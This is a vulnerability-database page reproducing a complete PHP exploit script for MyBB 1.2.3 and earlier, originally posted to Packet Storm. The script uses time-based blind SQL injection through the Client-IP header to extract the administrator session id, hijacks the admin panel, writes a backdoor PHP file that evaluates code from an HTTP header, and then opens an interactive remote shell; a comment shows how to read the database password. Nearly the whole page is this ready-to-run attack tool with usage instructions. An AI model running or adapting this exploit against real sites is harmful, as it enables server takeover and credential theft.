Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

mybb-exec.txt

🗓️ 04 Apr 2007 00:00:00Reported by DarkFigType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 25 Views

MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploi

Code
`#!/usr/bin/php  
<?php  
/**  
* This file require the PhpSploit class.  
* If you want to use this class, the latest  
* version can be downloaded from acid-root.new.fr.  
**/  
require("phpsploitclass.php");  
error_reporting(E_ALL ^ E_NOTICE);  
  
# http://www.milw0rm.com/exploits/2012  
# They corrected (not all) a lot of SQL requests which use the ipaddress, with $db->escape_string.  
# They don't corrected the function (this is a choice ... the bad) and they forgot to correct 1 (only) SQL request.  
# They must correct the problem at the source =)  
#  
if($argc < 3)  
{  
print("  
--- MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit ---  
-----------------------------------------------------------------------  
PHP conditions: none  
Credits: DarkFig <[email protected]>  
URL: http://www.acid-root.new.fr/  
-----------------------------------------------------------------------  
Usage: $argv[0] -url http://victim.com/ [Options]  
Params: -url For example http://victim.com/myBB/  
Options: -debug Debug mod activated (debug_mybb.html)  
-truetime Server response time which returns true  
-benchmark You can change the value used in benchmark()  
-proxy If you wanna use a proxy <proxyhost:proxyport>   
-proxyauth Basic authentification <proxyuser:proxypwd>  
Note: If you have some problems use -debug, -benchmark, -truetime  
-----------------------------------------------------------------------  
");exit(1);  
}  
  
$url = getparam('url',1);  
$debug = (getparam('debug')!='') ? 1 : 0;  
$benchmark = (getparam('benchmark')!='') ? getparam('benchmark') : '1000000';  
$proxy = getparam($proxy);  
$proxyauth = getparam($proxyauth);  
  
$backdoor = 'uploads/avatars/backdoor.php'; # inc/cache/backdoor.php  
$filetoed = 'index.lang.php';  
  
$xpl = new phpsploit();  
$xpl->agent('Firefox');  
if($proxy) $xpl->proxy($proxy);  
if($proxyauth) $xpl->proxyauth($proxyauth);  
if($debug) debug(1);  
  
# There is two solutions to be logged in as administrator.  
#  
# SOLUTION NUMBER 1  
# mysql> select * from mybb_users\G  
# *************************** 1. row ***************************  
# uid: 1  
# username: root  
# password: 39ac8681f5cf4fcd9c9c09719a618bd3  
# salt: BFeJBOCF  
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA...  
#  
# $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto=');  
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...  
#   
# SOLUTION NUMBER 2  
# mysql> select * from mybb_adminsessions\G  
# *************************** 1. row ***************************  
# sid: 81e267263b9254f3aaf670383bfbfec9  
# uid: 1  
# loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA  
# ip: 127.0.0.1  
# dateline: 1175443967  
# lastactive: 1175444369  
#  
# $xpl->addheader('Client-IP','127.0.0.1');  
# $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9');  
# print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel...  
#  
# I decided to use the solution number 2.  
# We can also add an administrator (easily) ... but it's not interesting.  
#  
print "\nAdmin IP : "; $ip = sql_inject('ip');  
print "\nAdmin sid: "; $sid = sql_inject('sid');  
print "\nTrying to be logged in as administrator";  
  
$xpl->addheader('Client-IP',$ip);  
$xpl->get($url."admin/languages.php?adminsid=$sid");  
  
# Trying to find the language  
if(preg_match('#<input type="hidden" name="lang" value="(\S*)"#',$xpl->getcontent(),$langmatches)) $lang=$langmatches[1];  
else $lang='english';  
print "\nLanguage: $lang";  
  
# Language configuration  
$xpl->get($url."admin/languages.php?adminsid=$sid&action=edit&lang=$lang&editwith=0&file=$filetoed");  
preg_match_all('#name="(.*)">(.*)</textarea>#',$xpl->getcontent(),$name_value);  
  
# We can't use:  
# - <? OR <?php  
# - <script language="php">  
# - ' OR "  
#  
$PHPCODE = '${${error_reporting(0)}}'  
.'${${$handle=fopen('.chrit('./'.$backdoor).','.chrit('w').')}}'  
.'${${fwrite($handle,'.chrit('<?php error_reporting(0);eval($_SERVER[HTTP_SHELL]);exit(0); ?>').')}}'  
.'${${fclose($handle)}}';  
$name_value[2][0] .= $PHPCODE;  
  
$postdata=array(frmdt_url => $url.'admin/languages.php',  
"adminsid" => $sid, "action" => "do_edit",  
"lang" => $lang, "editwith" => 0,  
"inadmin"=> 0, "file"=> $filetoed,  
"Update Language Variables"=>" Update Language Variables");  
  
for($i=0;$i<count($name_value[1]);$i++) $postdata[html_entity_decode($name_value[1][$i])] = html_entity_decode($name_value[2][$i]);  
  
# print $xpl->showlastrequest();  
$xpl->formdata($postdata);  
  
# Trying to execute the php code  
$xpl->get($url.'index.php');  
  
# If not the default language  
$xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed);  
print "\nThe php file should be created\n\$shell> ";  
  
# Hello master  
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))  
{  
# ');include('../../inc/config.php');print $config['password'];//  
$xpl->addheader('Shell',"system('$cmd');");  
$xpl->get($url.$backdoor);  
print $xpl->getcontent()."\n\$shell> ";  
}  
  
function sql_inject($field)  
{  
global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip  
$sub=0;$string='';  
  
if($field=='ip') {$a='44';$b='57';} # . 0-9  
else {$a='46';$b='70';} # 0-9 A-Z  
  
while(TRUE)  
{  
$sub++;  
for($i=$a;$i<=$b;$i++)  
{  
# Random ip  
$fakeip = rand(128,254).'.'  
.rand(128,254).'.'  
.rand(128,254).'.'  
.rand(128,254);  
  
# Calculation of the server response time which returns TRUE  
if($i==$a) $f='TST';  
  
# End of the string ?  
elseif($i==($a+1)) $f='NULL';  
  
# Test the char  
else $f=$i;  
  
# Table prefix  
if($sub==1 AND $i==$a)  
{  
$xpl->addheader('Client-IP',$fakeip."'<script>alert(666)</script>");  
$xpl->get($url.'index.php');  
  
if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1];  
else $prefix='mybb_';  
}  
  
# +-class_session.php (#2)  
# |  
# 475. function create_session($uid=0)  
# 476. {  
# 477. global $db;  
# 478. $speciallocs = $this->get_special_locations();  
# 479.  
# 480. // If there is a proper uid, delete by uid.  
# 481. if($uid > 0)  
# 482. {  
# 483. $db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid);  
# 484. $onlinedata['uid'] = $uid;  
# 485. }  
# 486. // Else delete by ip.  
# 487. else  
# 488. { // $this->ipaddress = get_ip();  
# 489. $db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'");  
# 490. $onlinedata['uid'] = 0;  
# 491. }  
#  
$sql = $fakeip."' OR ip=(SELECT IF(SUBSTR(";  
$sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)";  
$sql .= ($f=='TST') ? ",1" : ",$sub";  
$sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)";  
$sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #";  
  
  
# +-functions.php (#1)  
# |  
# 1836. function get_ip()  
# 1837. {  
# 1838. if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))  
# 1839. {  
# 1840. if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses))  
# 1841. {  
# 1842. foreach($addresses[0] as $key => $val)  
# 1843. {  
# 1844. if(!preg_match("#^(10|172\.16|192\.168)\.#", $val))  
# 1845. {  
# 1846. $ip = $val;  
# 1847. break;  
# 1848. }  
# 1849. }  
# 1850. }  
# 1851. }  
# 1852. if(!isset($ip))  
# 1853. {  
# 1854. if(isset($_SERVER['HTTP_CLIENT_IP']))  
# 1855. {  
# 1856. $ip = $_SERVER['HTTP_CLIENT_IP'];  
# 1857. }  
# 1858. else  
# 1859. {  
# 1860. $ip = $_SERVER['REMOTE_ADDR'];  
# 1861. }  
# 1862. }  
# 1863. return $ip;  
# 1864. }  
#  
$bef = time();  
$xpl->reset('header');  
$xpl->addheader('Client-IP',$sql);  
$xpl->get($url.'index.php');  
$aft = time();  
  
if($f=='TST') $truetime=$aft-$bef;  
if(getparam('truetime')!='') $truetime=getparam('truetime');  
  
# Server response time >= Server response time which returns TRUE ?  
$restime = $aft-$bef;  
if($restime >= $truetime AND $f != 'TST') $result='TRUE';  
else $result='FALSE';  
  
# Debug mode activated  
if($debug) debug('',$field);  
  
# The tested char returns TRUE  
if($result=='TRUE')  
{  
if($f!='NULL')  
{  
# Continue  
print strtolower(chr($f));  
$string .= chr($f);  
break;  
}  
else  
{  
# End of the string  
$xpl->reset('header');  
return $string;  
}  
}  
  
# Retry if no char found  
if($f==$b) $sub--;  
}  
}  
}  
  
function debug($init='',$dafield='')  
{  
global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip  
if($init)  
{  
$handle = fopen("debug_mybb.html","w+");  
$data = "<h1><div align='center'>MyBulletinBoard (MyBB) <= 1.2.3 Code Execution Exploit</div></h1>  
<pre><table width='0' border='1' align='center' cellspacing='0'><tr>  
<td align='center'><b>REQUEST TIME</b></td>  
<td align='center'><b>RESPONSE TIME</b></td>  
<td align='center'><b>TRUETIME</b></td>  
<td align='center'><b>BENCHMARK</b></td>  
<td align='center'><b>RESULT</b></td>";  
# <td align='center'><b>IP</b></td>  
$data .= "<td align='center'><b>FIELD</b></td>  
<td align='center'><b>CHARSET</b></td>  
<td align='center'><b>SUBSTR()</b></td>  
<td align='center'><b>ORD()</b></td>  
<td align='center'><b>CHAR()</b></td>";  
fwrite($handle,$data);  
fclose($handle);  
}  
else  
{  
$handle = fopen("debug_mybb.html","a");  
$data = "<tr".(($result=='TRUE') ? " bgcolor='#FFFF00'" : "").">  
<td align='center'>&nbsp;".htmlentities($bef)."&nbsp;</td>  
<td align='center'>&nbsp;".htmlentities($aft)."&nbsp;</td>  
<td align='center'>&nbsp;".htmlentities($truetime)."&nbsp;</td>  
<td align='center'>&nbsp;".htmlentities($benchmark)."&nbsp;</td>  
<td align='center'>&nbsp;".htmlentities($result)."&nbsp;</td>";  
# <td align='center'>&nbsp;".htmlentities($fakeip)."&nbsp;</td>  
$data .= "<td align='center'>&nbsp;".htmlentities($dafield)."&nbsp;</td>  
<td align='center'>&nbsp;".htmlentities("$a-$b")."&nbsp;</td>  
<td align='center'>&nbsp;".htmlentities($sub)."&nbsp;</td>  
<td align='center'>&nbsp;".htmlentities($f)."&nbsp;</td>  
<td align='center'>&nbsp;".htmlentities(chr($f))."&nbsp;</td></tr>";  
fwrite($handle,$data);  
fclose($handle);  
}  
}  
  
function chrit($string)  
{  
$char = '';  
for($i=0;$i<strlen($string);$i++)  
{  
$char .= 'chr('.ord($string[$i]).')';  
$char .= ($i != (strlen($string)-1)) ? '.' : '';  
}  
return $char;  
}  
  
function getparam($param,$opt='')  
{  
global $argv;  
foreach($argv as $value => $key)  
{  
if($key == '-'.$param) {  
if(!empty($argv[$value+1])) return $argv[$value+1];  
else return 1;  
}  
}  
if($opt) exit("\n-$param parameter required");  
else return;  
}  
?>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Apr 2007 00:00Current
7.4High risk
Vulners AI Score7.4
phpsploit classsql requestsmilw0rm exploitremote code executiondarkfigacid-root.new.frdebug modebenchmarkproxyproxyauthadministrator loginlanguage configurationphp code
25